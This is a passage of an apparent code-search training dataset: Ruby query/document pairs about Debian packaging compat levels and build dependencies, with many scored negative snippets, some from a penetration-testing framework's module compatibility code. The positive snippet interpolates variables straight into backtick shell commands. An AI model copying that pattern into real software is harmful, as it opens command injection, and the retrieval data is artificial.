"0.47101223",
"0.47047874",
"0.47028524",
"0.47004542",
"0.46875578",
"0.46868965",
"0.46855888",
"0.46820882",
"0.4679388",
"0.4678937",
"0.46715823",
"0.4666891",
"0.46621957",
"0.4661962",
"0.46578386",
"0.46527994"
] | 0.68672913 | 0 |
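Several negatives in the list above probe the machine architecture with `uname -m` and then normalize the result (for example, the snippets that return "64"/"32" or map "x64-based PC" to "x86_64"). A minimal, self-contained Ruby sketch of that shared pattern — the helper name is hypothetical and taken from none of the records:

    # Hypothetical helper illustrating the uname-based probe used by several
    # negatives above; `uname -m` is a standard POSIX command.
    def normalized_arch
      raw = `uname -m`.chomp            # e.g. "x86_64", "i686", "armv7l"
      case raw
      when /x86_64|amd64/ then "x86_64" # unify the two common 64-bit names
      when /\Ai[3-6]86\z/ then "i386"   # collapse i386..i686 to one label
      else raw                          # pass unmapped values through
      end
    end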
Define the default compat level | def set_compat_level(compatlevel = DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile = "debian/compat")
if File.exist?(compatfile)
existing_compatlevel = `cat #{compatfile}`.strip
Packager.warn "Apaka::Packaging::Debian::set_compat_level: existing '#{compatfile}' with compatlevel #{existing_compatlevel}"
end
Packager.info "Setting debian compat level to: #{compatlevel}"
`echo #{compatlevel} > #{compatfile}`
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bump_level\n return :major if @options[:major]\n return :minor if @options[:minor]\n return :patch if @options[:patch]\n end",
"def compat\n\t\tmodule_info['Compat'] || {}\n\tend",
"def level\n [MAJOR, MINOR, PATCH, PRE].compact.join(\".\")\n end",
"def compatibility_mode(compatibility = 1)\n @compatibility = compatibility\n end",
"def init_compat\n\t\tc = module_info['Compat']\n\n\t\tif (c == nil)\n\t\t\tc = module_info['Compat'] = Hash.new\n\t\tend\n\n\t\t# Initialize the module sub compatibilities\n\t\tc['Payload'] = Hash.new if (c['Payload'] == nil)\n\t\tc['Encoder'] = Hash.new if (c['Encoder'] == nil)\n\t\tc['Nop'] = Hash.new if (c['Nop'] == nil)\n\n\t\t# Update the compat-derived module specific compatibilities from\n\t\t# the specific ones to make a uniform view of compatibilities\n\t\tc['Payload'].update(module_info['PayloadCompat'] || {})\n\t\tc['Encoder'].update(module_info['EncoderCompat'] || {})\n\t\tc['Nop'].update(module_info['NopCompat'] || {})\n\tend",
"def min_android_security_patch_level=(value)\n @min_android_security_patch_level = value\n end",
"def init_compat\n super\n\n #\n # Merge in payload compatible defaults\n #\n p = module_info['Compat']['Payload']\n\n CompatDefaults::Payload.each_pair { |k,v|\n (p[k]) ? p[k] << \" #{v}\" : p[k] = v\n }\n\n #\n # Set the default save registers if none have been explicitly\n # specified.\n #\n if (module_info['SaveRegisters'] == nil)\n module_info['SaveRegisters'] = [ 'esp', 'ebp' ]\n end\n end",
"def level=( level )\n super(level || 0)\n end",
"def level=(new_level)\n super new_level.to_s\n end",
"def enforcement_level=(value)\n @enforcement_level = value\n end",
"def level= level\n if (0..6).include? level then @level = level\n elsif LEVEL.include? level.to_s then @level = LEVEL.index level\n else @level = UNKNOWN\n end\n end",
"def set_debug_level(val)\n super\n end",
"def set_debug_level(val)\n super\n end",
"def default_log_level\n\t\t\tif $DEBUG\n\t\t\t\tLogger::DEBUG\n\t\t\telsif $VERBOSE\n\t\t\t\tLogger::INFO\n\t\t\telse\n\t\t\t\tLogger::WARN\n\t\t\tend\n\t\tend",
"def default_log_level(env = ENV)\n\t\t\tif level = env['CONSOLE_LOG_LEVEL']\n\t\t\t\tLEVELS[level] || Logger.warn\n\t\t\telsif $DEBUG\n\t\t\t\tLogger::DEBUG\n\t\t\telsif $VERBOSE.nil?\n\t\t\t\tLogger::WARN\n\t\t\telse\n\t\t\t\tLogger::INFO\n\t\t\tend\n\t\tend",
"def level\n init unless @initialized\n level = level_to_sym(@level)\n end",
"def strict_mode=(value); end",
"def minor_version_default!\n self.minor_version = 0\n end",
"def default!\n self.severity = :DEFAULT\n end",
"def safe_level(*) end",
"def effective_version_threshold\n version_threshold || course.version_threshold\n end",
"def access_level=(new_level)\n super new_level.to_s\n end",
"def access_level=(new_level)\n super new_level.to_s\n end",
"def default_version; end",
"def safe_level\n safe? ? 4 : 0\n end",
"def min_android_security_patch_level\n return @min_android_security_patch_level\n end",
"def level=(level)\n @level = level\n @implementation.level = @level if @implementation\n level\n end",
"def level_for_env\n case RCApp.env\n when 'test'\n SILENT\n when 'debug'\n DEBUG\n when 'release'\n ERROR\n end\n end",
"def default_level\n ENV.key?(ENV_FLAG) ? ::Logger::DEBUG : ::Logger::WARN\n end",
"def log_level level\n level = Deployable::Logger.const_get level.upcase unless \n level.kind_of? ::Fixnum\n\n @log.level = level\n end",
"def level; end",
"def level; end",
"def level; end",
"def level; end",
"def level; end",
"def level; end",
"def major; end",
"def major; end",
"def major; end",
"def bump_major_version; end",
"def level=(_arg0); end",
"def level=(_arg0); end",
"def level\n @level ||= :warn\n end",
"def default_level\n self.levels[nil]\n end",
"def base_priority\n super || default_priority\n end",
"def level=(new_level)\n @logger.level=Logger::Severity.const_get(new_level.to_sym.upcase)\n end",
"def support_level\n @attributes[:support_level]\n end",
"def major=(_arg0); end",
"def gemfile_ruby_patchlevel\n if definition.ruby_version.respond_to?(:patchlevel)\n definition.ruby_version.patchlevel\n end\n end",
"def set_warn_level!(level = 2)\n warn_levels = ['0','1','2','no']\n return unless warn_levels.include?(level.to_s.downcase)\n\n @options[:warning] = level\n end",
"def level=(level) # needed to meet the Sentry spec\n @level = level.to_s == \"warn\" ? :warning : level\n end",
"def def_version; end",
"def log_level=(_arg0); end",
"def log_level=(_arg0); end",
"def log_level\n @log_level ||= DEFAULT_LOG_LEVEL\n end",
"def log_level\n @log_level ||= DEFAULT_LOG_LEVEL\n end",
"def default_style\n return 0\n end",
"def set_defaults\n self.version = 0\n end",
"def log_level=(level); end",
"def set_log_level(level=nil)\n defined?(Rails) and (default = (Rails.env.production? ? \"INFO\" : \"DEBUG\")) or (default = \"INFO\")\n log_level = (ENV['LOG_LEVEL'] || level || default)\n self.level = ZTK::Logger.const_get(log_level.to_s.upcase)\n end",
"def set_vendor_extension_warning!(level = 'Default')\n @options[:vextwarning] = nil if level.to_s.downcase == 'default'\n @options[:vextwarning] = 'true' if level.to_s.downcase == 'warnings'\n @options[:vextwarning] = 'false' if level.to_s.downcase == 'errors'\n end",
"def log_level; end",
"def log_level; end",
"def severity_level=(value)\n if value == @defaults['severityLevel']\n @values.delete 'severityLevel' if @values.key? 'severityLevel'\n else\n @values['severityLevel'] = value\n end\n end",
"def default_priority\n const_get(:DEFAULT_PRIORITY)\n end",
"def compilation_level\n # Try to map the compilation level to its expanded\n # version first, otherwise just return what was given\n COMPILATION_LEVELS[@compilation_level || :simple] || @compilation_level\n end",
"def compatibility(other)\n compat = 100\n compat -= 4 unless driving_pref + other.driving_pref == 0\n compat -= 5 if gender != other.gender\n compat -= 6 if company != other.company\n compat -= 3*(talkativeness-other.talkativeness).abs\n compat -= 20 if smoke != other.smoke\n compat -= 10 if ac != other.ac\n if radio_stations.length >= other.radio_stations.length\n stations1 = radio_stations\n stations2 = other.radio_stations\n else\n stations1 = other.radio_stations\n stations2 = radio_stations\n end\n stations1.each {|s| compat -= 1 unless stations2.include?(s)}\n return compat\n end",
"def minor; end",
"def minor; end",
"def minor; end",
"def set_arc_compatibility_flag!\n set_hash_value('set_arc_compatibility_flag', true)\n end",
"def dev_minor() end",
"def log_level\n @log_level ||= \"Log4r::#{@options[:log_level].upcase}\".constantize\n end",
"def level=(value)\n @level = ::Logger::Severity.const_get(value.to_s.upcase)\n end",
"def enforcement_level\n return @enforcement_level\n end",
"def logger_level; end",
"def minimum_warning_patch_version=(value)\n @minimum_warning_patch_version = value\n end",
"def set_log_level( level )\n case level\n when :fatal\n ::Logger::FATAL\n when :error\n ::Logger::ERROR\n when :warn\n ::Logger::WARN\n when :info\n ::Logger::INFO\n when :debug\n ::Logger::DEBUG\n else\n ::Logger::INFO\n end\n end",
"def default_priority\n 0\n end",
"def level=(level)\n init unless @initialized\n unless @level_frozen\n new_level = case level\n when Symbol then level_from_sym(level)\n when String then level_from_sym(level.to_sym)\n else level\n end\n if new_level != @level\n @logger.info(\"[setup] setting log level to #{level_to_sym(new_level).to_s.upcase}\")\n @logger.level = @level = new_level\n end\n end\n level = level_to_sym(@level)\n end",
"def bump_patch_version; end",
"def level(l)\n @config[:level] = l\n end",
"def transition_to_dev inc: :patch\n props = { prerelease: ['dev'] }\n \n t.match level,\n 'release', ->(_) {\n succ = public_send( inc ).succ\n \n merge inc => succ, **props\n },\n \n 'rc', ->(_) {\n merge **props\n },\n \n 'dev', ->(_) {\n raise QB::VersionError,\n \"Version #{ self } is already at `dev` level\"\n }\n end",
"def effective_version_penalty \n version_penalty || course.version_penalty\n end",
"def rollbar_level(severity)\n [:debug, :info, :warning, :error, :critical, :error][severity] || :error\n end",
"def set_safe_level\n @@safe_level = $SAFE\n end",
"def level\n @level || :trace\n end",
"def level\n @level || :trace\n end",
"def major_version; end",
"def level\n Logger::Severity.constants.each do |name|\n return name.downcase.to_sym if @logger.level.eql?(Logger::Severity.const_get(name))\n end\n raise \"error\"\n end",
"def log_level(value)\n Logger.log_level = value\n return nil\n end",
"def minimum_warning_patch_version\n return @minimum_warning_patch_version\n end",
"def level=(lvl)\n @level = if lvl.is_a?(Integer)\n lvl\n else\n Level::NAME_TO_LEVEL.fetch(lvl.to_s.upcase)\n end\n end",
"def get_default_log_check_levels\n return [:error, :fatal]\n end",
"def loglevel(level)\n if level < 0 or level > 2\n return nil\n end\n @loglevel = level\n return @loglevel\n end",
"def set_certification_level(level)\n case level\n when :form_filling\n certification_level = PdfSignatureAppearance::CERTIFIED_FORM_FILLING\n when :form_filling_and_annotations\n certification_level = PdfSignatureAppearance::CERTIFIED_FORM_FILLING_AND_ANNOTATIONS\n when :no_changes_allowed\n certification_level = PdfSignatureAppearance::CERTIFIED_NO_CHANGES_ALLOWED\n when :not_certified\n level = PdfSignatureAppearance::NOT_CERTIFIED\n end\n @stamper.getSignatureAppearance.setCertificationLevel(certification_level)\n end",
"def log_level\n @log_level ||= WARN\n end",
"def set_arc_compatibility_flag!\n @set_arc_compatibility_flag = true\n end",
"def level\n @level || Helpers.char_level(@entity)\n end",
"def level=(val)\n unless LEVELS.include?(val)\n fail \"Unknown log level, valid values are: #{LEVELS}\"\n end\n\n # Map the log4r levels to our simplified 3 level system\n # log4r level order is DEBUG < INFO < WARN < ERROR < FATAL\n case val\n when :normal\n # Output everything except debug statements\n console.level = Logger::INFO\n # Output everything\n log_files(:level=, Logger::DEBUG) unless console_only?\n when :verbose\n console.level = Logger::DEBUG\n log_files(:level=, Logger::DEBUG) unless console_only?\n when :silent\n # We don't use any fatal messages, so this is effectively OFF\n console.level = Logger::FATAL\n log_files(:level=, Logger::DEBUG) unless console_only?\n end\n\n @level = val\n end"
] | [
"0.66932446",
"0.6421182",
"0.6386833",
"0.6287057",
"0.61542505",
"0.6137305",
"0.6110456",
"0.5946597",
"0.5921266",
"0.58900195",
"0.5840121",
"0.5821903",
"0.5821903",
"0.58121353",
"0.5804544",
"0.5798878",
"0.5747369",
"0.5746987",
"0.572297",
"0.57138383",
"0.5693415",
"0.5676373",
"0.5676373",
"0.56718373",
"0.56714946",
"0.56597036",
"0.5655084",
"0.5648998",
"0.5635256",
"0.5634947",
"0.5618969",
"0.5618969",
"0.5618969",
"0.5618969",
"0.5618969",
"0.5618969",
"0.5592288",
"0.5592288",
"0.5592288",
"0.5580812",
"0.5565497",
"0.5565497",
"0.5553639",
"0.5530803",
"0.5503491",
"0.54974353",
"0.5480446",
"0.54720867",
"0.54685354",
"0.5448487",
"0.5445048",
"0.5434652",
"0.5432741",
"0.5432741",
"0.54101795",
"0.54101795",
"0.54098845",
"0.5393741",
"0.5379425",
"0.5376443",
"0.53650105",
"0.53637767",
"0.53637767",
"0.53521717",
"0.5339598",
"0.5317103",
"0.53168625",
"0.5314232",
"0.5314232",
"0.5314232",
"0.5300317",
"0.5299572",
"0.5281752",
"0.52768856",
"0.5276694",
"0.52766186",
"0.52665913",
"0.52658504",
"0.5265211",
"0.5247147",
"0.5245832",
"0.5243723",
"0.52348256",
"0.52252746",
"0.5219887",
"0.52162427",
"0.52101636",
"0.52101636",
"0.5203871",
"0.51978934",
"0.5197752",
"0.51962703",
"0.519366",
"0.5192193",
"0.51815355",
"0.51760584",
"0.5163388",
"0.5153402",
"0.5129472",
"0.51277256"
] | 0.7287851 | 0 |
Compute the build dependencies for a package info object return [Array] list of dependencies | def build_dependencies(pkginfo)
dependencies = []
pkgdeps = pkginfo.dependencies
deps = pkgdeps[:rock_pkginfo].select do |pkginfo|
pkg_name = debian_name(pkginfo, true)
!rock_release_platform.ancestorContains(pkg_name)
end .map { |p| p.name }
gems = pkgdeps[:nonnative].select do |gem,version|
pkg_ruby_name = debian_ruby_name(gem, false)
pkg_prefixed_name = debian_ruby_name(gem, true)
!( rock_release_platform.ancestorContains(gem) ||
rock_release_platform.ancestorContains(pkg_ruby_name) ||
rock_release_platform.ancestorContains(pkg_prefixed_name))
end .map{ |p| p[0] }
deps.concat(gems)
deps
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def compute_revdeps\n result = Hash.new { |h, k| h[k] = Set.new }\n each_autobuild_package do |pkg|\n pkg.dependencies.each do |pkg_name|\n result[pkg_name] << pkg.name\n end\n pkg.optional_dependencies.each do |pkg_name|\n result[pkg_name] << pkg.name\n end\n pkg.os_packages.each do |pkg_name|\n result[pkg_name] << pkg.name\n end\n end\n result\n end",
"def find_dependencies(env)\n args = [] if (env = env.dup).sub!(REGEXP_DEVPKG,'') # are we in compile mode?\n return [[], [], args] if args && env.empty?\n\n require 'rubygems/remote_fetcher'\n @@deps = YAML.load(fetch(env))['gems'] unless defined?(@@deps)\n @@deps.key?(spec.name) or return(args ? [[], [], args] : nil)\n\n # find dependencies\n case deps = @@deps[spec.name]\n when nil, \"*\" # for nil or '*', use the default extension name\n deps = [\"*\"]\n when String # string of space-delimited packages and extensions\n when Array # array of packages and extensions\n when Hash # hash of packages and extensions, indexed by version requirements\n reqs, deps = deps.find do |reqs, info| # deps is an array or space-delimited string\n Gem::Requirement.new(reqs.split(',')).satisfied_by?(spec.version)\n end\n reqs or return # can't find the right version\n deps ||= [\"*\"] # deps are nil, use the default extension name\n end\n deps = deps.strip.split(/\\s+/) if deps.is_a?(String)\n deps = deps.compact.uniq\n\n # helpful variables\n bcwd = Dir.pwd\n benv = File.dirname(env.split(/[?;#]/,2).first)\n name = \"#{spec.full_name}.tar.gz\"\n\n # grok dependencies\n pkgs, exts = [], []\n deps.each do |item|\n if item.include?(\"*\") || item =~ REGEXP_SCHEMA || item.include?(\".tar.gz\")\n exts << item unless args\n elsif item =~ REGEXP_DEVPKG\n pkgs << $' if args\n elsif item =~ REGEXP_DEVARG\n args << $' if args\n else\n pkgs << item unless args\n end\n end\n exts.map! do |item|\n case item\n when \"*\" then item = File.join(benv, name) # use complete default tarball name\n when /\\A\\*/ then item[0,1] = benv # path relative to env variable\n when /\\A[^\\/]/ then item[0,0] = bcwd + \"/\" # path relative to current directory\n end\n item.gsub(\"*\", name) # swap inline wildcards with default tarball name\n end\n [pkgs, exts, args]\n end",
"def go_list_deps\n args = [\"-deps\"]\n args << \"-mod=vendor\" if config.dig(\"go\", \"mod\") == \"vendor\"\n\n # the CLI command returns packages in a pretty-printed JSON format but\n # not separated by commas. this gsub adds commas after all non-indented\n # \"}\" that close root level objects.\n # (?!\\z) uses negative lookahead to not match the final \"}\"\n deps = package_info_command(*args).gsub(/^}(?!\\z)$/m, \"},\")\n JSON.parse(\"[#{deps}]\")\n end",
"def dependencies(pkg)\n pkg.resolve_optional_dependencies\n deps_rock_packages = pkg.dependencies.map do |pkg_name|\n debian_name(Autoproj.manifest.package(pkg_name).autobuild)\n end.sort\n\n pkg_osdeps = Autoproj.osdeps.resolve_os_dependencies(pkg.os_packages)\n # There are limitations regarding handling packages with native dependencies\n #\n # Currently gems need to converted into debs using gem2deb\n # These deps dependencies are updated here before uploading a package\n # \n # Generation of the debian packages from the gems can be done in postprocessing step\n # i.e. see convert_gems\n \n deps_osdeps_packages = []\n native_package_manager = Autoproj.osdeps.os_package_handler\n _, native_pkg_list = pkg_osdeps.find { |handler, _| handler == native_package_manager }\n\n deps_osdeps_packages += native_pkg_list if native_pkg_list\n\n # Update global list\n @osdeps += deps_osdeps_packages\n\n non_native_handlers = pkg_osdeps.collect do |handler, pkg_list|\n if handler != native_package_manager\n [handler, pkg_list]\n end\n end.compact\n\n non_native_handlers.each do |pkg_handler, pkg_list|\n # Convert native ruby gems package names to rock-xxx \n if pkg_handler.kind_of?(Autoproj::PackageManagers::GemManager)\n pkg_list.each do |name,version|\n @ruby_gems << [name,version]\n deps_osdeps_packages << debian_ruby_name(name)\n end\n else\n raise ArgumentError, \"cannot package #{pkg.name} as it has non-native dependencies (#{pkg_list}) -- #{pkg_handler.class} #{pkg_handler}\"\n end\n end\n\n # Remove duplicates\n @osdeps.uniq!\n @ruby_gems.uniq!\n\n # Return rock packages and osdeps\n [deps_rock_packages, deps_osdeps_packages]\n end",
"def build_components_object\n info = @scan_report.to_h.fetch(:info)\n return [] unless info[:dependencies]\n\n components = []\n\n info[:dependencies].each do |dependency|\n components << parse_dependency(dependency)\n end\n components\n end",
"def recursive_dependencies(pkginfo)\n\n all_required_pkginfos = pkginfo.required_rock_packages\n\n all_recursive_deps = {:rock => [], :osdeps => [], :nonnative => [], :extra_gems => []}\n all_required_pkginfos.each do |pkginfo|\n pdep = filtered_dependencies(pkginfo)\n pdep.keys.each do |k|\n all_recursive_deps[k].concat pdep[k]\n end\n end\n all_recursive_deps.each_value { |a| a.uniq! }\n\n if !all_recursive_deps[:nonnative].empty?\n all_recursive_deps[:nonnative] = GemDependencies::resolve_all(all_recursive_deps[:nonnative]).keys\n end\n recursive_deps = all_recursive_deps.values.flatten.uniq\n end",
"def dependencies\n return @dependencies unless @dependencies.nil?\n @dependencies = [ ]\n lockfile.each_line do |line|\n if line =~ /^\\s{4}([-\\w_.0-9]+)\\s*\\((.*)\\)/\n @dependencies << [$1, $2]\n end\n end\n @dependencies\n end",
"def dependencies(name)\n dependencies = []\n submodule = submodule(name)\n if submodule.has_key?(:dependencies)\n submodule[:dependencies].each do |dependency|\n dependencies << dependency\n dependencies << dependencies(dependency)\n end\n end\n\n dependencies.flatten.uniq.sort\n end",
"def dependencies( *args )\n names = args # note: for now assume all args are just names\n # e.g. 'pluto-models', 'pluto-update', etc.\n deps = @versions.select do |rec| names.include?( rec[0] ) end\n .map do |rec| [rec[0], rec[1]] end\n\n ## todo/fix: throw exception if dependency is missing!\n ## names.size == deps.size\n puts \"names.size == deps.size #{names.size} == #{deps.size}\"\n deps\n end",
"def dependencies\n []\n end",
"def dependent_gems(check_dev=true)\n out = []\n Gem::Specification.each do |spec|\n deps = check_dev ? spec.dependencies : spec.runtime_dependencies\n deps.each do |dep|\n if self.satisfies_requirement?(dep)\n sats = []\n find_all_satisfiers(dep) do |sat|\n sats << sat\n end\n out << [spec, dep, sats]\n end\n end\n end\n out\n end",
"def dependencies\n []\n end",
"def parse_deps(input)\n matches = input.scan(/\\s+-\\s+\\[ \\]\\s+(\\S+)\\s+(\\S+\\s+[0-9.]+)/) || []\n\n gemspecs = matches.map do |match|\n {:name => match[0], :version => match[1]}\n end\n\n # NOTE: These gemspecs are gems that are not yet loaded. We don't know if\n # they are installed or not, so we don't know for sure if the\n # dependency will be met at runtime. So, we'll execute a gem command\n # to check to see if these are installed and ignore the ones that\n # already are.\n gemspecs.delete_if do |gemspec|\n cmd = \"gem list #{gemspec[:name]} -i -l\"\n if gemspec[:version]\n cmd << \" -v '#{gemspec[:version]}'\"\n end\n `#{cmd}` =~ /true/\n end\n\n return gemspecs\n end",
"def dependencies\n members.each_with_object([]) do |attr_name, depends|\n value = send(attr_name)\n value = pipeline.objects.fetch(value) if value.is_a?(Symbol)\n depends << value.dependencies << value if value.is_a?(PipelineObject)\n end.flatten\n end",
"def get_dependencies(lib_path)\n\tdeps = []\n\tentry_name_regex = /(.*)\\(compatibility version.*\\)/\n\t`otool -L '#{lib_path}'`.strip.split(\"\\n\").each do |entry|\n\t\tmatch = entry_name_regex.match(entry)\n\t\tif (match)\n\t\t\tdep_path = match[1].strip\n\n\t\t\t# Note - otool lists dependencies separately for each architecture\n\t\t\t# in a universal binary - only return the unique paths\n\t\t\tdeps << dep_path if !deps.include?(dep_path)\n\t\tend\n\tend\n\treturn deps\nend",
"def get_dependencies(lib_path)\n\tdeps = []\n\tentry_name_regex = /(.*)\\(compatibility version.*\\)/\n\t`otool -L '#{lib_path}'`.strip.split(\"\\n\").each do |entry|\n\t\tmatch = entry_name_regex.match(entry)\n\t\tif (match)\n\t\t\tdep_path = match[1].strip\n\n\t\t\t# Note - otool lists dependencies separately for each architecture\n\t\t\t# in a universal binary - only return the unique paths\n\t\t\tdeps << dep_path if !deps.include?(dep_path)\n\t\tend\n\tend\n\treturn deps\nend",
"def depends_upon(match_name) #, constraint)\n list = []\n $LEDGER.each do |name, libs|\n case libs\n when Library\n list << libs if libs.requirements.any?{ |r| match_name == r['name'] } \n else\n libs.each do |lib|\n list << lib if lib.requirements.any?{ |r| match_name == r['name'] } \n end\n end\n end\n list\n end",
"def dependencies\n []\n end",
"def dependencies\n version_req = if options[:version]\n ::Gem::Requirement.create(options[:version])\n else\n ::Gem::Requirement.default\n end\n if gem_dir\n ::Gem.clear_paths; ::Gem.path.unshift(gem_dir)\n ::Gem.source_index.refresh!\n end\n deps = []\n ::Gem.source_index.each do |fullname, gemspec| \n if version_req.satisfied_by?(gemspec.version)\n deps << ::Gem::Dependency.new(gemspec.name, \"= #{gemspec.version}\")\n end\n end\n ::Gem.clear_paths if gem_dir\n deps.sort\n end",
"def dependencies\n @dependencies.values\n end",
"def dependency_list\n @target.dependencies.map(&:display_name)\n end",
"def dependencies\n @dependencies ||= []\n end",
"def dependencies\n @dependencies ||= []\n end",
"def dependencies\n @dependencies ||= []\n end",
"def dependencies\n @dependencies ||= []\n end",
"def get_dep_names(data)\n return unless data.key?(\"dependencies\")\n\n data['dependencies'].each do |name, dep_info|\n @deps[name] = {}\n get_dep_names(dep_info) if dep_info['dependencies']\n end\n end",
"def getDependencies service\r\n deps = []\r\n Util.csprojs(service).each do |csproj|\r\n deps += getDeps(csproj) \r\n end\r\n return deps.uniq\r\nend",
"def gem_build_requirements\n @metadata[:build_requires].nil? ? [] :\n @metadata[:build_requires].select { |r| r.gem? }\n end",
"def depend_upon(match_name) #, constraint)\n list = []\n each do |name, libs|\n case libs\n when Library\n list << libs if libs.requirements.any?{ |r| match_name == r['name'] } \n else\n libs.each do |lib|\n list << lib if lib.requirements.any?{ |r| match_name == r['name'] } \n end\n end\n end\n list\n end",
"def build_local_dependency_list(force=true)\n install_root = self.internal_package_root\n\n unless File.exists?(install_root)\n return nil unless force\n rebuild_dependency_list\n end\n\n Dir[File.join(install_root, '*')].map do |package_name|\n pkg = BPM::Package.new package_name\n pkg.load_json\n pkg\n end\n end",
"def check_dependencies\n fetch_module_dependencies.map do |dependency, constraint|\n dependency = dependency.sub('-', '/')\n current = dependency == @updated_module ? SemanticPuppet::Version.parse(@updated_module_version) : @forge.get_current_version(dependency)\n [dependency, constraint, current, constraint.include?(current)]\n end\n end",
"def depends_on()\n if @value.nil?\n return []\n end\n unless @depends_on\n @depends_on = @value.variables.collect do |var|\n\ttmp = @parent.variable_by_name(var)\n\ttmp or raise \"Can't locate variable dependency '#{var}'!\"\n end\n end\n @depends_on\n end",
"def go_pkg_deps(pkgs, root_path)\n deps = []\n pkgs.each do |pkg|\n deps << pkg\n `go list -f '{{ join .Deps \"\\\\n\"}}' #{pkg}`.split(\"\\n\").select do |path|\n if path.start_with? root_path\n deps << path\n end\n end\n end\n return deps.sort.uniq\nend",
"def go_pkg_deps(pkgs, root_path)\n deps = []\n pkgs.each do |pkg|\n deps << pkg\n `go list -f '{{ join .Deps \"\\\\n\"}}' #{pkg}`.split(\"\\n\").select do |path|\n if path.start_with? root_path\n deps << path\n end\n end\n end\n return deps.sort.uniq\nend",
"def dependencies\n @dependencies ||= []\n end",
"def dependencies\n node.output[carrier].keys\n end",
"def walk_down_dependencies(pkg_name, known_deps=Array.new)\n\talldeps = Array.new\n\t@total_deps[pkg_name].each { |m|\n\t\tunless alldeps.include?(m) || m.nil? || known_deps.include?(m) \n\t\t\talldeps = alldeps + walk_down_dependencies(m, alldeps)\n\t\tend\n\t\talldeps.push m\n\t}\n\talldeps.uniq!\n\talldeps.push pkg_name\n\t# puts alldeps.join(\", \") \n\treturn alldeps.compact \nend",
"def dependency_versions(args = {}, &bl)\n versions = {}\n args = {:recursive => true, :dev_deps => true, :versions => versions}.merge(args)\n deps.each do |dep|\n gem = Polisher::Gem.retrieve(dep.name)\n versions.merge!(gem.versions(args, &bl))\n end\n versions\n end",
"def dependencies_for(specification)\n []\n end",
"def dependencies(recurse: true)\n return @dependencies if @dependencies\n if depends.nil? || depends.empty?\n @dependencies = nil\n else\n @dependencies = depends.map do |name, dependency|\n loader = StackFileLoader.for(dependency['stack'], self)\n deps = { 'name' => name, 'stack' => loader.source, 'variables' => dependency.fetch('variables', Hash.new) }\n if recurse\n child_deps = loader.dependencies\n deps['depends'] = child_deps unless child_deps.nil?\n end\n deps\n end\n end\n end",
"def dependencies(include_parent = false)\n []\n end",
"def dependencies(include_parent = false)\n []\n end",
"def dependencies(include_parent = false)\n []\n end",
"def remote_dependencies(gem_name, _version)\n conn = Faraday.new(url: 'https://rubygems.org') do |h|\n h.headers[:content_type] = 'application/x-www-form-urlencoded'\n h.request :url_encoded\n h.adapter :excon\n end\n response = conn.get(\"/api/v1/gems/#{gem_name}.json\")\n dep_list = MultiJson.load(response.body)\n dep_list['dependencies'].values.flatten.map do |j|\n Gem::Dependency.new(\n j['name'],\n Gem::Requirement.new(j['requirements'].split(','))\n )\n end\n end",
"def dependency_tree(args = {}, &bl)\n dependencies = {}\n args = {:recursive => true,\n :dev_deps => true,\n :matching => :latest,\n :dependencies => dependencies}.merge(args)\n\n process = []\n deps.each do |dep|\n resolved = nil\n begin\n resolved = Polisher::Gem.matching(dep, args[:matching])\n rescue\n end\n yield self, dep, resolved\n process << resolved unless resolved.nil?\n end\n\n process.each { |dep|\n dependencies.merge!(dep.dependency_tree(args, &bl))\n }\n\n dependencies\n end",
"def deps(sequence)\n return [] unless checker.valid? # Exit early if it's bad data\n all = [] # Start collecting the list.\n CeleryScript::TreeClimber.travel(tree, ->(n) {\n # Iterate over each node, looking for \"args of interest\".\n # Tools, sub sequences, etc.\n ARGS_OF_INTEREST.map do |arg, klass|\n id = n&.args&.fetch(arg, nil)&.value\n all.push(klass.find(id)) if id\n end\n })\n\n # Filter out the target sequence to prevent runaway recursion.\n # It would be impossible to delete recursive sequences otherwise.\n all.select! { |d| !(d.is_a?(Sequence) && (d.id == sequence.id)) }\n\n # Finally, output the data in a format that can directly be used by\n # SequenceDependency#create!().\n return all.uniq.map do |d|\n { sequence: sequence, dependency_type: d.class, dependency_id: d.id }\n end\n end",
"def runtime_dependencies\n dependencies.select(&:runtime?)\n end",
"def getdeps(pkg)\n deps = []\n @pkg.each {|k, v| deps << k if v.include?(pkg) }\n\n return deps\n end",
"def core_fetch_dependencies(deps, verbose)\n deps.each do |pkg_name, pkg_version|\n core_fetch_dependency pkg_name, pkg_version, :runtime, verbose\n end\n end",
"def bundler_dependencies_for(bundler_runtime, *groups); end",
"def component_deps(cmp)\n component(cmp).fetch('deps', [])\nend",
"def component_deps(cmp)\n component(cmp).fetch('deps', [])\nend",
"def generate_dependencies_data(podfile)\n podfile.dependencies.map(&:to_s).sort\n end",
"def dependency_versions(args = {}, &bl)\n versions = args[:versions] || {}\n check_deps = args[:dev] ? dev_deps : deps\n\n check_deps.each do |dep|\n unless versions.key?(dep.name)\n begin\n gem = Polisher::Gem.retrieve(dep.name)\n versions.merge! gem.versions(args, &bl)\n rescue\n unknown = Polisher::VersionChecker.unknown_version(:all, dep.name, &bl)\n versions.merge! dep.name => unknown\n end\n end\n\n args[:versions] = versions\n end\n\n versions\n end",
"def run_package_for_specified(bundle_info)\n if $options[:buildAll]\n info 'Packaging all dependencies'\n\n $toPackageDeps = []\n\n all_dependencies.each do |dep|\n files = dep.getInstalledFiles\n\n $toPackageDeps.push dep.Name if files && !files.empty?\n end\n\n puts $toPackageDeps.to_s\n end\n\n package_dependencies $toPackageDeps, bundle_info\nend",
"def filtered_dependencies(pkginfo, with_rock_release_prefix = true)\n target_platform = @packager.target_platform\n this_rock_release = TargetPlatform.new(@packager.rock_release_name, target_platform.architecture)\n\n deps_rock_pkginfos = pkginfo.dependencies[:rock_pkginfo].dup\n deps_osdeps_packages = pkginfo.dependencies[:osdeps].dup\n non_native_dependencies = pkginfo.dependencies[:nonnative].dup\n\n if target_platform.distribution_release_name\n # CASTXML vs. GCCXML in typelib\n if pkginfo.name =~ /typelib$/\n # add/remove the optional dependencies on the\n # rock-package depending on the target platform\n # there are typelib versions with and without the\n # optional depends. we know which platform requires\n # a particular dependency.\n deps_rock_pkginfos.delete_if do |pkginfo|\n pkginfo.name == \"castxml\" || pkginfo.name == \"gccxml\"\n end\n\n if target_platform.contains(\"castxml\")\n deps_osdeps_packages.push(\"castxml\")\n elsif target_platform.contains(\"gccxml\")\n #todo: these need to checked on the other platforms\n deps_osdeps_packages.push(\"gccxml\")\n else\n raise ArgumentError, \"TargetPlatform: #{target_platform} does neither support castxml nor gccml - cannot build typelib\"\n 